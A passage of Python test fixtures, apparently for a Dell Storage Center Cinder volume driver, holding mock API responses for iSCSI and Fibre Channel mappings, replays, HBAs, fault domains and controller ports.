u'objectType': u'ScPhysicalServer'},
u'volume':
{u'instanceId': u'64702.6025',
u'instanceName': u'Server_21000024ff30441d Test Vol',
u'objectType': u'ScVolume'},
u'connectivity': u'Up',
u'readOnly': False,
u'objectType': u'ScMappingProfile',
u'hostCache': False,
u'mappedVia': u'Server',
u'mapCount': 3,
u'instanceName': u'6025-47',
u'lunRequested': u'N/A'}
MAP_PROFILES = [MAP_PROFILE]
MAPPINGS = [{u'profile': {u'instanceId': u'64702.104',
u'instanceName': u'92-30',
u'objectType': u'ScMappingProfile'},
u'status': u'Down',
u'statusMessage': u'',
u'instanceId': u'64702.969.64702',
u'scName': u'Storage Center 64702',
u'scSerialNumber': 64702,
u'controller': {u'instanceId': u'64702.64702',
u'instanceName': u'SN 64702',
u'objectType': u'ScController'},
u'server': {u'instanceId': u'64702.30',
u'instanceName':
u'Server_iqn.1993-08.org.debian:01:3776df826e4f',
u'objectType': u'ScPhysicalServer'},
u'volume': {u'instanceId': u'64702.92',
u'instanceName':
u'volume-74a21934-60ad-4cf2-b89b-1f0dda309ddf',
u'objectType': u'ScVolume'},
u'readOnly': False,
u'lun': 1,
u'lunUsed': [1],
u'serverHba': {u'instanceId': u'64702.3454975614',
u'instanceName':
u'iqn.1993-08.org.debian:01:3776df826e4f',
u'objectType': u'ScServerHba'},
u'path': {u'instanceId': u'64702.64702.64702.31.8',
u'instanceName':
u'iqn.1993-08.org.debian:'
'01:3776df826e4f-5000D31000FCBE43',
u'objectType': u'ScServerHbaPath'},
u'controllerPort': {u'instanceId':
u'64702.5764839588723736131.91',
u'instanceName': u'5000D31000FCBE43',
u'objectType': u'ScControllerPort'},
u'instanceName': u'64702-969',
u'transport': u'Iscsi',
u'objectType': u'ScMapping'}]
# Multiple mappings to test find_iscsi_properties with multiple portals
MAPPINGS_MULTI_PORTAL = \
[{u'profile': {u'instanceId': u'64702.104',
u'instanceName': u'92-30',
u'objectType': u'ScMappingProfile'},
u'status': u'Down',
u'statusMessage': u'',
u'instanceId': u'64702.969.64702',
u'scName': u'Storage Center 64702',
u'scSerialNumber': 64702,
u'controller': {u'instanceId': u'64702.64702',
u'instanceName': u'SN 64702',
u'objectType': u'ScController'},
u'server': {u'instanceId': u'64702.30',
u'instanceName':
u'Server_iqn.1993-08.org.debian:01:3776df826e4f',
u'objectType': u'ScPhysicalServer'},
u'volume': {u'instanceId': u'64702.92',
u'instanceName':
u'volume-74a21934-60ad-4cf2-b89b-1f0dda309ddf',
u'objectType': u'ScVolume'},
u'readOnly': False,
u'lun': 1,
u'lunUsed': [1],
u'serverHba': {u'instanceId': u'64702.3454975614',
u'instanceName':
u'iqn.1993-08.org.debian:01:3776df826e4f',
u'objectType': u'ScServerHba'},
u'path': {u'instanceId': u'64702.64702.64702.31.8',
u'instanceName':
u'iqn.1993-08.org.debian:'
'01:3776df826e4f-5000D31000FCBE43',
u'objectType': u'ScServerHbaPath'},
u'controllerPort': {u'instanceId':
u'64702.5764839588723736131.91',
u'instanceName': u'5000D31000FCBE43',
u'objectType': u'ScControllerPort'},
u'instanceName': u'64702-969',
u'transport': u'Iscsi',
u'objectType': u'ScMapping'},
{u'profile': {u'instanceId': u'64702.104',
u'instanceName': u'92-30',
u'objectType': u'ScMappingProfile'},
u'status': u'Down',
u'statusMessage': u'',
u'instanceId': u'64702.969.64702',
u'scName': u'Storage Center 64702',
u'scSerialNumber': 64702,
u'controller': {u'instanceId': u'64702.64702',
u'instanceName': u'SN 64702',
u'objectType': u'ScController'},
u'server': {u'instanceId': u'64702.30',
u'instanceName':
u'Server_iqn.1993-08.org.debian:01:3776df826e4f',
u'objectType': u'ScPhysicalServer'},
u'volume': {u'instanceId': u'64702.92',
u'instanceName':
u'volume-74a21934-60ad-4cf2-b89b-1f0dda309ddf',
u'objectType': u'ScVolume'},
u'readOnly': False,
u'lun': 1,
u'lunUsed': [1],
u'serverHba': {u'instanceId': u'64702.3454975614',
u'instanceName':
u'iqn.1993-08.org.debian:01:3776df826e4f',
u'objectType': u'ScServerHba'},
u'path': {u'instanceId': u'64702.64702.64702.31.8',
u'instanceName':
u'iqn.1993-08.org.debian:'
'01:3776df826e4f-5000D31000FCBE43',
u'objectType': u'ScServerHbaPath'},
u'controllerPort': {u'instanceId':
u'64702.5764839588723736131.91',
u'instanceName': u'5000D31000FCBE43',
u'objectType': u'ScControllerPort'},
u'instanceName': u'64702-969',
u'transport': u'Iscsi',
u'objectType': u'ScMapping'}]
MAPPINGS_READ_ONLY = \
[{u'profile': {u'instanceId': u'64702.104',
u'instanceName': u'92-30',
u'objectType': u'ScMappingProfile'},
u'status': u'Down',
u'statusMessage': u'',
u'instanceId': u'64702.969.64702',
u'scName': u'Storage Center 64702',
u'scSerialNumber': 64702,
u'controller': {u'instanceId': u'64702.64702',
u'instanceName': u'SN 64702',
u'objectType': u'ScController'},
u'server': {u'instanceId': u'64702.30',
u'instanceName':
u'Server_iqn.1993-08.org.debian:01:3776df826e4f',
u'objectType': u'ScPhysicalServer'},
u'volume': {u'instanceId': u'64702.92',
u'instanceName':
u'volume-74a21934-60ad-4cf2-b89b-1f0dda309ddf',
u'objectType': u'ScVolume'},
u'readOnly': True,
u'lun': 1,
u'lunUsed': [1],
u'serverHba': {u'instanceId': u'64702.3454975614',
u'instanceName':
u'iqn.1993-08.org.debian:01:3776df826e4f',
u'objectType': u'ScServerHba'},
u'path': {u'instanceId': u'64702.64702.64702.31.8',
u'instanceName':
u'iqn.1993-08.org.debian:'
'01:3776df826e4f-5000D31000FCBE43',
u'objectType': u'ScServerHbaPath'},
u'controllerPort': {u'instanceId':
u'64702.5764839588723736131.91',
u'instanceName':
u'5000D31000FCBE43',
u'objectType': u'ScControllerPort'},
u'instanceName': u'64702-969',
u'transport': u'Iscsi',
u'objectType': u'ScMapping'}]
FC_MAPPINGS = [{u'profile': {u'instanceId': u'64702.2941',
u'instanceName': u'6025-47',
u'objectType': u'ScMappingProfile'},
u'status': u'Up',
u'statusMessage': u'',
u'instanceId': u'64702.7639.64702',
u'scName': u'Storage Center 64702',
u'scSerialNumber': 64702,
u'controller': {u'instanceId': u'64702.64703',
u'instanceName': u'SN 64703',
u'objectType': u'ScController'},
u'server': {u'instanceId': u'64702.47',
u'instanceName': u'Server_21000024ff30441d',
u'objectType': u'ScPhysicalServer'},
u'volume': {u'instanceId': u'64702.6025',
u'instanceName':
u'Server_21000024ff30441d Test Vol',
u'objectType': u'ScVolume'},
u'readOnly': False,
u'lun': 1,
u'serverHba': {u'instanceId': u'64702.3282218607',
u'instanceName': u'21000024FF30441C',
u'objectType': u'ScServerHba'},
u'path': {u'instanceId': u'64702.64702.64703.27.73',
u'instanceName':
u'21000024FF30441C-5000D31000FCBE36',
u'objectType': u'ScServerHbaPath'},
u'controllerPort':
{u'instanceId': u'64702.5764839588723736118.50',
u'instanceName': u'5000D31000FCBE36',
u'objectType': u'ScControllerPort'},
u'instanceName': u'64702-7639',
u'transport': u'FibreChannel',
u'objectType': u'ScMapping'},
{u'profile': {u'instanceId': u'64702.2941',
u'instanceName': u'6025-47',
u'objectType': u'ScMappingProfile'},
u'status': u'Up',
u'statusMessage': u'',
u'instanceId': u'64702.7640.64702',
u'scName': u'Storage Center 64702',
u'scSerialNumber': 64702,
u'controller': {u'instanceId': u'64702.64703',
u'instanceName': u'SN 64703',
u'objectType': u'ScController'},
u'server': {u'instanceId': u'64702.47',
u'instanceName': u'Server_21000024ff30441d',
u'objectType': u'ScPhysicalServer'},
u'volume':
{u'instanceId': u'64702.6025',
u'instanceName': u'Server_21000024ff30441d Test Vol',
u'objectType': u'ScVolume'},
u'readOnly': False,
u'lun': 1,
u'serverHba': {u'instanceId': u'64702.3282218606',
u'instanceName': u'21000024FF30441D',
u'objectType': u'ScServerHba'},
u'path':
{u'instanceId': u'64702.64702.64703.27.78',
u'instanceName': u'21000024FF30441D-5000D31000FCBE36',
u'objectType': u'ScServerHbaPath'},
u'controllerPort':
{u'instanceId': u'64702.5764839588723736118.50',
u'instanceName': u'5000D31000FCBE36',
u'objectType': u'ScControllerPort'},
u'instanceName': u'64702-7640',
u'transport': u'FibreChannel',
u'objectType': u'ScMapping'},
{u'profile': {u'instanceId': u'64702.2941',
u'instanceName': u'6025-47',
u'objectType': u'ScMappingProfile'},
u'status': u'Up',
u'statusMessage': u'',
u'instanceId': u'64702.7638.64702',
u'scName': u'Storage Center 64702',
u'scSerialNumber': 64702,
u'controller': {u'instanceId': u'64702.64703',
u'instanceName': u'SN 64703',
u'objectType': u'ScController'},
u'server': {u'instanceId': u'64702.47',
u'instanceName': u'Server_21000024ff30441d',
u'objectType': u'ScPhysicalServer'},
u'volume': {u'instanceId': u'64702.6025',
u'instanceName':
u'Server_21000024ff30441d Test Vol',
u'objectType': u'ScVolume'},
u'readOnly': False,
u'lun': 1,
u'serverHba': {u'instanceId': u'64702.3282218606',
u'instanceName': u'21000024FF30441D',
u'objectType': u'ScServerHba'},
u'path':
{u'instanceId': u'64702.64702.64703.28.76',
u'instanceName': u'21000024FF30441D-5000D31000FCBE3E',
u'objectType': u'ScServerHbaPath'},
u'controllerPort': {u'instanceId':
u'64702.5764839588723736126.60',
u'instanceName': u'5000D31000FCBE3E',
u'objectType': u'ScControllerPort'},
u'instanceName': u'64702-7638',
u'transport': u'FibreChannel',
u'objectType': u'ScMapping'}]
FC_MAPPINGS_LUN_MISMATCH = \
[{u'profile': {u'instanceId': u'64702.2941',
u'instanceName': u'6025-47',
u'objectType': u'ScMappingProfile'},
u'status': u'Up',
u'statusMessage': u'',
u'instanceId': u'64702.7639.64702',
u'scName': u'Storage Center 64702',
u'scSerialNumber': 64702,
u'controller': {u'instanceId': u'64702.64703',
u'instanceName': u'SN 64703',
u'objectType': u'ScController'},
u'server': {u'instanceId': u'64702.47',
u'instanceName': u'Server_21000024ff30441d',
u'objectType': u'ScPhysicalServer'},
u'volume': {u'instanceId': u'64702.6025',
u'instanceName':
u'Server_21000024ff30441d Test Vol',
u'objectType': u'ScVolume'},
u'readOnly': False,
u'lun': 1,
u'serverHba': {u'instanceId': u'64702.3282218607',
u'instanceName': u'21000024FF30441C',
u'objectType': u'ScServerHba'},
u'path': {u'instanceId': u'64702.64702.64703.27.73',
u'instanceName':
u'21000024FF30441C-5000D31000FCBE36',
u'objectType': u'ScServerHbaPath'},
u'controllerPort':
{u'instanceId': u'64702.5764839588723736118.50',
u'instanceName': u'5000D31000FCBE36',
u'objectType': u'ScControllerPort'},
u'instanceName': u'64702-7639',
u'transport': u'FibreChannel',
u'objectType': u'ScMapping'},
{u'profile': {u'instanceId': u'64702.2941',
u'instanceName': u'6025-47',
u'objectType': u'ScMappingProfile'},
u'status': u'Up',
u'statusMessage': u'',
u'instanceId': u'64702.7640.64702',
u'scName': u'Storage Center 64702',
u'scSerialNumber': 64702,
u'controller': {u'instanceId': u'64702.64703',
u'instanceName': u'SN 64703',
u'objectType': u'ScController'},
u'server': {u'instanceId': u'64702.47',
u'instanceName': u'Server_21000024ff30441d',
u'objectType': u'ScPhysicalServer'},
u'volume':
{u'instanceId': u'64702.6025',
u'instanceName': u'Server_21000024ff30441d Test Vol',
u'objectType': u'ScVolume'},
u'readOnly': False,
u'lun': 1,
u'serverHba': {u'instanceId': u'64702.3282218606',
u'instanceName': u'21000024FF30441D',
u'objectType': u'ScServerHba'},
u'path':
{u'instanceId': u'64702.64702.64703.27.78',
u'instanceName': u'21000024FF30441D-5000D31000FCBE36',
u'objectType': u'ScServerHbaPath'},
u'controllerPort':
{u'instanceId': u'64702.5764839588723736118.50',
u'instanceName': u'5000D31000FCBE36',
u'objectType': u'ScControllerPort'},
u'instanceName': u'64702-7640',
u'transport': u'FibreChannel',
u'objectType': u'ScMapping'},
{u'profile': {u'instanceId': u'64702.2941',
u'instanceName': u'6025-47',
u'objectType': u'ScMappingProfile'},
u'status': u'Up',
u'statusMessage': u'',
u'instanceId': u'64702.7638.64702',
u'scName': u'Storage Center 64702',
u'scSerialNumber': 64702,
u'controller': {u'instanceId': u'64702.64703',
u'instanceName': u'SN 64703',
u'objectType': u'ScController'},
u'server': {u'instanceId': u'64702.47',
u'instanceName': u'Server_21000024ff30441d',
u'objectType': u'ScPhysicalServer'},
u'volume': {u'instanceId': u'64702.6025',
u'instanceName':
u'Server_21000024ff30441d Test Vol',
u'objectType': u'ScVolume'},
u'readOnly': False,
u'lun': 2,
u'serverHba': {u'instanceId': u'64702.3282218606',
u'instanceName': u'21000024FF30441D',
u'objectType': u'ScServerHba'},
u'path':
{u'instanceId': u'64702.64702.64703.28.76',
u'instanceName': u'21000024FF30441D-5000D31000FCBE3E',
u'objectType': u'ScServerHbaPath'},
u'controllerPort': {u'instanceId':
u'64702.5764839588723736126.60',
u'instanceName': u'5000D31000FCBE3E',
u'objectType': u'ScControllerPort'},
u'instanceName': u'64702-7638',
u'transport': u'FibreChannel',
u'objectType': u'ScMapping'}]
RPLAY = {u'scSerialNumber': 64702,
u'globalIndex': u'64702-46-250',
u'description': u'Cinder Clone Replay',
u'parent': {u'instanceId': u'64702.46.249',
u'instanceName': u'64702-46-249',
u'objectType': u'ScReplay'},
u'instanceId': u'64702.46.250',
u'scName': u'Storage Center 64702',
u'consistent': False,
u'expires': True,
u'freezeTime': u'12/09/2014 03:52:08 PM',
u'createVolume': {u'instanceId': u'64702.46',
u'instanceName':
u'volume-ff9589d3-2d41-48d5-9ef5-2713a875e85b',
u'objectType': u'ScVolume'},
u'expireTime': u'12/09/2014 04:52:08 PM',
u'source': u'Manual',
u'spaceRecovery': False,
u'writesHeldDuration': 7910,
u'active': False,
u'markedForExpiration': False,
u'objectType': u'ScReplay',
u'instanceName': u'12/09/2014 03:52:08 PM',
u'size': u'0.0 Bytes'
}
RPLAYS = [{u'scSerialNumber': 64702,
u'globalIndex': u'64702-6025-5',
u'description': u'Manually Created',
u'parent': {u'instanceId': u'64702.6025.4',
u'instanceName': u'64702-6025-4',
u'objectType': u'ScReplay'},
u'instanceId': u'64702.6025.5',
u'scName': u'Storage Center 64702',
u'consistent': False,
u'expires': True,
u'freezeTime': u'02/02/2015 08:23:55 PM',
u'createVolume': {u'instanceId': u'64702.6025',
u'instanceName':
u'Server_21000024ff30441d Test Vol',
u'objectType': u'ScVolume'},
u'expireTime': u'02/02/2015 09:23:55 PM',
u'source': u'Manual',
u'spaceRecovery': False,
u'writesHeldDuration': 7889,
u'active': False,
u'markedForExpiration': False,
u'objectType': u'ScReplay',
u'instanceName': u'02/02/2015 08:23:55 PM',
u'size': u'0.0 Bytes'},
{u'scSerialNumber': 64702,
u'globalIndex': u'64702-6025-4',
u'description': u'Cinder Test Replay012345678910',
u'parent': {u'instanceId': u'64702.6025.3',
u'instanceName': u'64702-6025-3',
u'objectType': u'ScReplay'},
u'instanceId': u'64702.6025.4',
u'scName': u'Storage Center 64702',
u'consistent': False,
u'expires': True,
u'freezeTime': u'02/02/2015 08:23:47 PM',
u'createVolume': {u'instanceId': u'64702.6025',
u'instanceName':
u'Server_21000024ff30441d Test Vol',
u'objectType': u'ScVolume'},
u'expireTime': u'02/02/2015 09:23:47 PM',
u'source': u'Manual',
u'spaceRecovery': False,
u'writesHeldDuration': 7869,
u'active': False,
u'markedForExpiration': False,
u'objectType': u'ScReplay',
u'instanceName': u'02/02/2015 08:23:47 PM',
u'size': u'0.0 Bytes'}]
TST_RPLAY = {u'scSerialNumber': 64702,
u'globalIndex': u'64702-6025-4',
u'description': u'Cinder Test Replay012345678910',
u'parent': {u'instanceId': u'64702.6025.3',
u'instanceName': u'64702-6025-3',
u'objectType': u'ScReplay'},
u'instanceId': u'64702.6025.4',
u'scName': u'Storage Center 64702',
u'consistent': False,
u'expires': True,
u'freezeTime': u'02/02/2015 08:23:47 PM',
u'createVolume': {u'instanceId': u'64702.6025',
u'instanceName':
u'Server_21000024ff30441d Test Vol',
u'objectType': u'ScVolume'},
u'expireTime': u'02/02/2015 09:23:47 PM',
u'source': u'Manual',
u'spaceRecovery': False,
u'writesHeldDuration': 7869,
u'active': False,
u'markedForExpiration': False,
u'objectType': u'ScReplay',
u'instanceName': u'02/02/2015 08:23:47 PM',
u'size': u'0.0 Bytes'}
FLDR = {u'status': u'Up',
u'instanceName': u'opnstktst',
u'name': u'opnstktst',
u'parent':
{u'instanceId': u'64702.0',
u'instanceName': u'Volumes',
u'objectType': u'ScVolumeFolder'},
u'instanceId': u'64702.43',
u'scName': u'Storage Center 64702',
u'notes': u'Folder for OpenStack Cinder Driver',
u'scSerialNumber': 64702,
u'parentIndex': 0,
u'okToDelete': True,
u'folderPath': u'',
u'root': False,
u'statusMessage': u'',
u'objectType': u'ScVolumeFolder'}
SVR_FLDR = {u'status': u'Up',
u'instanceName': u'devstacksrv',
u'name': u'devstacksrv',
u'parent': {u'instanceId': u'64702.0',
u'instanceName': u'Servers',
u'objectType': u'ScServerFolder'},
u'instanceId': u'64702.4',
u'scName': u'Storage Center 64702',
u'notes': u'Folder for OpenStack Cinder Driver',
u'scSerialNumber': 64702,
u'parentIndex': 0,
u'okToDelete': False,
u'folderPath': u'',
u'root': False,
u'statusMessage': u'',
u'objectType': u'ScServerFolder'}
ISCSI_HBA = {u'portWwnList': [],
u'iscsiIpAddress': u'0.0.0.0',
u'pathCount': 1,
u'name': u'iqn.1993-08.org.debian:01:52332b70525',
u'connectivity': u'Down',
u'instanceId': u'64702.3786433166',
u'scName': u'Storage Center 64702',
u'notes': u'',
u'scSerialNumber': 64702,
u'server':
{u'instanceId': u'64702.38',
u'instanceName':
u'Server_iqn.1993-08.org.debian:01:52332b70525',
u'objectType': u'ScPhysicalServer'},
u'remoteStorageCenter': False,
u'iscsiName': u'',
u'portType': u'Iscsi',
u'instanceName': u'iqn.1993-08.org.debian:01:52332b70525',
u'objectType': u'ScServerHba'}
FC_HBAS = [{u'portWwnList': [],
u'iscsiIpAddress': u'0.0.0.0',
u'pathCount': 2,
u'name': u'21000024FF30441C',
u'connectivity': u'Up',
u'instanceId': u'64702.3282218607',
u'scName': u'Storage Center 64702',
u'notes': u'',
u'scSerialNumber': 64702,
u'server': {u'instanceId': u'64702.47',
u'instanceName': u'Server_21000024ff30441d',
u'objectType': u'ScPhysicalServer'},
u'remoteStorageCenter': False,
u'iscsiName': u'',
u'portType': u'FibreChannel',
u'instanceName': u'21000024FF30441C',
u'objectType': u'ScServerHba'},
{u'portWwnList': [],
u'iscsiIpAddress': u'0.0.0.0',
u'pathCount': 3,
u'name': u'21000024FF30441D',
u'connectivity': u'Partial',
u'instanceId': u'64702.3282218606',
u'scName': u'Storage Center 64702',
u'notes': u'',
u'scSerialNumber': 64702,
u'server': {u'instanceId': u'64702.47',
u'instanceName': u'Server_21000024ff30441d',
u'objectType': u'ScPhysicalServer'},
u'remoteStorageCenter': False,
u'iscsiName': u'',
u'portType': u'FibreChannel',
u'instanceName': u'21000024FF30441D',
u'objectType': u'ScServerHba'}]
FC_HBA = {u'portWwnList': [],
u'iscsiIpAddress': u'0.0.0.0',
u'pathCount': 3,
u'name': u'21000024FF30441D',
u'connectivity': u'Partial',
u'instanceId': u'64702.3282218606',
u'scName': u'Storage Center 64702',
u'notes': u'',
u'scSerialNumber': 64702,
u'server': {u'instanceId': u'64702.47',
u'instanceName': u'Server_21000024ff30441d',
u'objectType': u'ScPhysicalServer'},
u'remoteStorageCenter': False,
u'iscsiName': u'',
u'portType': u'FibreChannel',
u'instanceName': u'21000024FF30441D',
u'objectType': u'ScServerHba'}
SVR_OS_S = [{u'allowsLunGaps': True,
u'product': u'Red Hat Linux',
u'supportsActiveMappingDeletion': True,
u'version': u'6.x',
u'requiresLunZero': False,
u'scName': u'Storage Center 64702',
u'virtualMachineGuest': True,
u'virtualMachineHost': False,
u'allowsCrossTransportMapping': False,
u'objectType': u'ScServerOperatingSystem',
u'instanceId': u'64702.38',
u'lunCanVaryAcrossPaths': False,
u'scSerialNumber': 64702,
u'maximumVolumeSize': u'0.0 Bytes',
u'multipath': True,
u'instanceName': u'Red Hat Linux 6.x',
u'supportsActiveMappingCreation': True,
u'name': u'Red Hat Linux 6.x'}]
ISCSI_FLT_DOMAINS = [{u'headerDigestEnabled': False,
u'classOfServicePriority': 0,
u'wellKnownIpAddress': u'192.168.0.21',
u'scSerialNumber': 64702,
u'iscsiName':
u'iqn.2002-03.com.compellent:5000d31000fcbe42',
u'portNumber': 3260,
u'subnetMask': u'255.255.255.0',
u'gateway': u'192.168.0.1',
u'objectType': u'ScIscsiFaultDomain',
u'chapEnabled': False,
u'instanceId': u'64702.6.5.3',
u'childStatus': u'Up',
u'defaultTimeToRetain': u'SECONDS_20',
u'dataDigestEnabled': False,
u'instanceName': u'iSCSI 10G 2',
u'statusMessage': u'',
u'status': u'Up',
u'transportType': u'Iscsi',
u'vlanId': 0,
u'windowSize': u'131072.0 Bytes',
u'defaultTimeToWait': u'SECONDS_2',
u'scsiCommandTimeout': u'MINUTES_1',
u'deleteAllowed': False,
u'name': u'iSCSI 10G 2',
u'immediateDataWriteEnabled': False,
u'scName': u'Storage Center 64702',
u'notes': u'',
u'mtu': u'MTU_1500',
u'bidirectionalChapSecret': u'',
u'keepAliveTimeout': u'SECONDS_30'}]
# For testing find_iscsi_properties where multiple portals are found
ISCSI_FLT_DOMAINS_MULTI_PORTALS = \
[{u'headerDigestEnabled': False,
u'classOfServicePriority': 0,
u'wellKnownIpAddress': u'192.168.0.21',
u'scSerialNumber': 64702,
u'iscsiName':
u'iqn.2002-03.com.compellent:5000d31000fcbe42',
u'portNumber': 3260,
u'subnetMask': u'255.255.255.0',
u'gateway': u'192.168.0.1',
u'objectType': u'ScIscsiFaultDomain',
u'chapEnabled': False,
u'instanceId': u'64702.6.5.3',
u'childStatus': u'Up',
u'defaultTimeToRetain': u'SECONDS_20',
u'dataDigestEnabled': False,
u'instanceName': u'iSCSI 10G 2',
u'statusMessage': u'',
u'status': u'Up',
u'transportType': u'Iscsi',
u'vlanId': 0,
u'windowSize': u'131072.0 Bytes',
u'defaultTimeToWait': u'SECONDS_2',
u'scsiCommandTimeout': u'MINUTES_1',
u'deleteAllowed': False,
u'name': u'iSCSI 10G 2',
u'immediateDataWriteEnabled': False,
u'scName': u'Storage Center 64702',
u'notes': u'',
u'mtu': u'MTU_1500',
u'bidirectionalChapSecret': u'',
u'keepAliveTimeout': u'SECONDS_30'},
{u'headerDigestEnabled': False,
u'classOfServicePriority': 0,
u'wellKnownIpAddress': u'192.168.0.25',
u'scSerialNumber': 64702,
u'iscsiName':
u'iqn.2002-03.com.compellent:5000d31000fcbe42',
u'portNumber': 3260,
u'subnetMask': u'255.255.255.0',
u'gateway': u'192.168.0.1',
u'objectType': u'ScIscsiFaultDomain',
u'chapEnabled': False,
u'instanceId': u'64702.6.5.3',
u'childStatus': u'Up',
u'defaultTimeToRetain': u'SECONDS_20',
u'dataDigestEnabled': False,
u'instanceName': u'iSCSI 10G 2',
u'statusMessage': u'',
u'status': u'Up',
u'transportType': u'Iscsi',
u'vlanId': 0,
u'windowSize': u'131072.0 Bytes',
u'defaultTimeToWait': u'SECONDS_2',
u'scsiCommandTimeout': u'MINUTES_1',
u'deleteAllowed': False,
u'name': u'iSCSI 10G 2',
u'immediateDataWriteEnabled': False,
u'scName': u'Storage Center 64702',
u'notes': u'',
u'mtu': u'MTU_1500',
u'bidirectionalChapSecret': u'',
u'keepAliveTimeout': u'SECONDS_30'}]
ISCSI_FLT_DOMAIN = {u'headerDigestEnabled': False,
u'classOfServicePriority': 0,
u'wellKnownIpAddress': u'192.168.0.21',
u'scSerialNumber': 64702,
u'iscsiName':
u'iqn.2002-03.com.compellent:5000d31000fcbe42',
u'portNumber': 3260,
u'subnetMask': u'255.255.255.0',
u'gateway': u'192.168.0.1',
u'objectType': u'ScIscsiFaultDomain',
u'chapEnabled': False,
u'instanceId': u'64702.6.5.3',
u'childStatus': u'Up',
u'defaultTimeToRetain': u'SECONDS_20',
u'dataDigestEnabled': False,
u'instanceName': u'iSCSI 10G 2',
u'statusMessage': u'',
u'status': u'Up',
u'transportType': u'Iscsi',
u'vlanId': 0,
u'windowSize': u'131072.0 Bytes',
u'defaultTimeToWait': u'SECONDS_2',
u'scsiCommandTimeout': u'MINUTES_1',
u'deleteAllowed': False,
u'name': u'iSCSI 10G 2',
u'immediateDataWriteEnabled': False,
u'scName': u'Storage Center 64702',
u'notes': u'',
u'mtu': u'MTU_1500',
u'bidirectionalChapSecret': u'',
u'keepAliveTimeout': u'SECONDS_30'}
CTRLR_PORT = {u'status': u'Up',
u'iscsiIpAddress': u'0.0.0.0',
u'WWN': u'5000D31000FCBE06',
u'name': u'5000D31000FCBE06',
u'iscsiGateway': u'0.0.0.0',
u'instanceId': u'64702.5764839588723736070.51',
u'scName': u'Storage Center 64702',
u'scSerialNumber': 64702,
u'transportType': u'FibreChannel',
u'virtual': False,
u'controller': {u'instanceId': u'64702.64702',
u'instanceName': u'SN 64702',
u'objectType': u'ScController'},
u'iscsiName': u'',
u'purpose': u'FrontEnd',
u'iscsiSubnetMask': u'0.0.0.0',
u'faultDomain':
{u'instanceId': u'64702.4.3',
u'instanceName': u'Domain 1',
u'objectType': u'ScControllerPortFaultDomain'},
u'instanceName': u'5000D31000FCBE06',
u'statusMessage': u'',
u'objectType': u'ScControllerPort'}
ISCSI_CTRLR_PORT = {u'preferredParent':
{u'instanceId': u'64702.5764839588723736074.69',
u'instanceName': u'5000D31000FCBE0A',
u'objectType': u'ScControllerPort'},
u'status': u'Up',
u'iscsiIpAddress': u'10.23.8.235',
u'WWN': u'5000D31000FCBE43',
u'name': u'5000D31000FCBE43',
u'parent':
{u'instanceId': u'64702.5764839588723736074.69',
u'instanceName': u'5000D31000FCBE0A',
u'objectType': u'ScControllerPort'},
u'iscsiGateway': u'0.0.0.0',
u'instanceId': u'64702.5764839588723736131.91',
u'scName': u'Storage Center 64702',
u'scSerialNumber': 64702,
u'transportType': u'Iscsi',
u'virtual': True,
u'controller': {u'instanceId': u'64702.64702',
u'instanceName': u'SN 64702',
u'objectType': u'ScController'},
u'iscsiName':
u'iqn.2002-03.com.compellent:5000d31000fcbe43',
u'purpose': u'FrontEnd',
u'iscsiSubnetMask': u'0.0.0.0',
u'faultDomain':
{u'instanceId': u'64702.6.5',
u'instanceName': u'iSCSI 10G 2',
u'objectType': u'ScControllerPortFaultDomain'},
u'instanceName': u'5000D31000FCBE43',
u'childStatus': u'Up',
u'statusMessage': u'',
u'objectType': u'ScControllerPort'}
FC_CTRLR_PORT = {u'preferredParent':
{u'instanceId': u'64702.5764839588723736093.57',
u'instanceName': u'5000D31000FCBE1D',
u'objectType': u'ScControllerPort'},
u'status': u'Up',
u'iscsiIpAddress': u'0.0.0.0',
u'WWN': u'5000D31000FCBE36',
u'name': u'5000D31000FCBE36',
u'parent':
{u'instanceId': u'64702.5764839588723736093.57',
u'instanceName': u'5000D31000FCBE1D',
u'objectType': u'ScControllerPort'},
u'iscsiGateway': u'0.0.0.0',
u'instanceId': u'64702.5764839588723736118.50',
u'scName': u'Storage Center 64702',
u'scSerialNumber': 64702,
u'transportType': u'FibreChannel',
u'virtual': True,
u'controller': {u'instanceId': u'64702.64703',
u'instanceName': u'SN 64703',
u'objectType': u'ScController'},
u'iscsiName': u'',
u'purpose': u'FrontEnd',
u'iscsiSubnetMask': u'0.0.0.0',
u'faultDomain':
{u'instanceId': u'64702.1.0',
u'instanceName': u'Domain 0',
u'objectType': u'ScControllerPortFaultDomain'},
u'instanceName': u'5000D31000FCBE36',
u'childStatus': u'Up',
u'statusMessage': u'',
u'objectType': u'ScControllerPort'}
FC_CTRLR_PORT_WWN_ERROR = \
{u'preferredParent':
{u'instanceId': u'64702.5764839588723736093.57',
u'instanceName': u'5000D31000FCBE1D',
u'objectType': u'ScControllerPort'},
u'status': u'Up',
u'iscsiIpAddress': u'0.0.0.0',
u'Wwn': u'5000D31000FCBE36',
u'name': u'5000D31000FCBE36',
u'parent':
{u'instanceId': u'64702.5764839588723736093.57',
u'instanceName': u'5000D31000FCBE1D',
u'objectType': u'ScControllerPort'},
u'iscsiGateway': u'0.0.0.0',
u'instanceId': u'64702.5764839588723736118.50',
u'scName': u'Storage Center 64702',
u'scSerialNumber': 64702,
u'transportType': u'FibreChannel',
u'virtual': True,
u'controller': {u'instanceId': u'64702.64703',
u'instanceName': u'SN 64703',
u'objectType': u'ScController'},
u'iscsiName': u'',
u'purpose': u'FrontEnd',
u'iscsiSubnetMask': u'0.0.0.0',
u'faultDomain':
{u'instanceId': u'64702.1.0',
u'instanceName': u'Domain 0',
u'objectType': u'ScControllerPortFaultDomain'},
u'instanceName': u'5000D31000FCBE36',
u'childStatus': u'Up',
u'statusMessage': u'',
u'objectType': u'ScControllerPort'}
STRG_USAGE = {u'systemSpace': u'7.38197504E8 Bytes',
u'freeSpace': u'1.297659461632E13 Bytes',
u'oversubscribedSpace': u'0.0 Bytes',
u'instanceId': u'64702',
u'scName': u'Storage Center 64702',
u'savingVsRaidTen': u'1.13737990144E11 Bytes',
u'allocatedSpace': u'1.66791217152E12 Bytes',
u'usedSpace': u'3.25716017152E11 Bytes',
u'configuredSpace': u'9.155796533248E12 Bytes',
u'alertThresholdSpace': u'1.197207956992E13 Bytes',
u'availableSpace': u'1.3302310633472E13 Bytes',
u'badSpace': u'0.0 Bytes',
u'time': u'02/02/2015 02:23:39 PM',
u'scSerialNumber': 64702,
u'instanceName': u'Storage Center 64702',
u'storageAlertThreshold': 10,
u'objectType': u'StorageCenterStorageUsage'}
RPLAY_PROFILE = {u'name': u'fc8f2fec-fab2-4e34-9148-c094c913b9a3',
u'type': u'Consistent',
u'notes': u'Created by Dell Cinder Driver',
u'volumeCount': 0,
u'expireIncompleteReplaySets': True,
u'replayCreationTimeout': 20,
